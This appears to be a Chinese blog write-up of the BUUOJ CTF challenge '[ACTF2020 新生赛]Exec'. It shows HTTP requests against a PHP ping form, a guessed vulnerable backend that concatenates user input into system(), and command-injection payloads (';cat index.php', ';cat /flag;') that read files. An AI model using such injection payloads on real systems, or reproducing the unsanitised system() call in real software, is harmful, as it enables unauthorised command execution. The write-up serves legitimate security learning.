[ACTF2020 新生赛]Exec

题目链接:https://buuoj.cn/challenges#[ACTF2020 新生赛]Exec

打开后,环境如下。

尝试输入 "127.0.0.1",抓取请求包。

POST / HTTP/1.1
Host: 038dc28f-5191-4958-8946-1127f62ad770.node5.buuoj.cn:81
Content-Length: 16
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
Origin: http://038dc28f-5191-4958-8946-1127f62ad770.node5.buuoj.cn:81
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.6367.155 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Referer: http://038dc28f-5191-4958-8946-1127f62ad770.node5.buuoj.cn:81/
Accept-Encoding: gzip, deflate, br
Accept-Language: zh-CN,zh;q=0.9
Connection: keep-alive

target=127.0.0.1

查看响应包。

HTTP/1.1 200 OK
Server: openresty
Date: Tue, 22 Oct 2024 16:25:28 GMT
Content-Type: text/html; charset=UTF-8
Connection: keep-alive
Vary: Accept-Encoding
X-Powered-By: PHP/7.3.13
Cache-Control: no-cache
Content-Length: 960

<!DOCTYPE html>
<html lang="en">
<head>
    <meta charset="UTF-8">
    <title>command execution</title>
    <link href="http://libs.baidu.com/bootstrap/3.0.3/css/bootstrap.min.css" rel="stylesheet" />


</head>
<body>

<h1>PING</h1>
<form class="form-inline" method="post">

    <div class="input-group">
        <input style="width:280px;" id="target" type="text" class="form-control" placeholder="请输入需要ping的地址" aria-describedby="basic-addon1" name="target">
    </div>
    <br/>
    <br/>

    <button  style="width:280px;" class="btn btn-default">PING</button>


</form>
<br /><pre>
PING 127.0.0.1 (127.0.0.1): 56 data bytes
64 bytes from 127.0.0.1: seq=0 ttl=42 time=0.033 ms
64 bytes from 127.0.0.1: seq=1 ttl=42 time=0.063 ms
64 bytes from 127.0.0.1: seq=2 ttl=42 time=0.060 ms

--- 127.0.0.1 ping statistics ---
3 packets transmitted, 3 packets received, 0% packet loss
round-trip min/avg/max = 0.033/0.052/0.063 ms
</pre></body>
</html>

可以发现,后端似乎是将用户在参数 target 上的输入,与 ping 进行拼接后,当作系统命令去执行,猜测后端代码的实现类似如下(实际上,通过本题的漏洞可以看到源码的实现:target=;cat index.php)。

if (isset($_POST['target'])) {
	system("ping -c 3 ".$_POST['target']);
}

因此,直接对命令进行拼接,即可读取 flag。

POST / HTTP/1.1
Host: 038dc28f-5191-4958-8946-1127f62ad770.node5.buuoj.cn:81
Content-Length: 18
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
Origin: http://038dc28f-5191-4958-8946-1127f62ad770.node5.buuoj.cn:81
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.6367.155 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Referer: http://038dc28f-5191-4958-8946-1127f62ad770.node5.buuoj.cn:81/
Accept-Encoding: gzip, deflate, br
Accept-Language: zh-CN,zh;q=0.9
Connection: keep-alive

target=;cat /flag;

posted @ 2024-11-01 21:46  imtaieee  阅读(4)  评论(0编辑  收藏  举报